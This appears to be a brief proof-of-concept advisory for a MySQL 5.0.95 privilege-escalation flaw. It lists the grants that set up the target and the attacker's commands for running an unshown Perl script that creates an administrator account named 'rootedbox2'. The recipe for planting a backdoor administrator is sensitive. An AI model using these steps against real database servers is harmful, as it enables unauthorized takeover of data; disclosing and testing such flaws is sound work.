PoC provided by :
Affected version(s) :
Tested on Centos 5.8 x86 with :
MySQL Server version 5.0.95 Source distribution
An attacker with access to a MySQL database through a user having some specific privileges, will be allowed, through this vulnerability to create a MySQL administrator user. The created user specified in the PoC script is by default “rootedbox2” with “rootedbox2” as password.
On the target side : CREATE DATABASE exampledb; GRANT ALL PRIVILEGES ON exampledb.* TO user1@'192.168.178.26' IDENTIFIED BY 'test'; GRANT FILE ON *.* TO user1@'192.168.178.26' IDENTIFIED BY 'test'; FLUSH PRIVILEGES; On the attacker side : mysql -u user1 -h 192.168.178.34 -p exampledb -> allowed mysql -u rootedbox2 -h 192.168.178.34 -p -> denied perl mysql_privilege_elevation.pl mysql -u rootedbox2 -h 192.168.178.34 -p -> allowed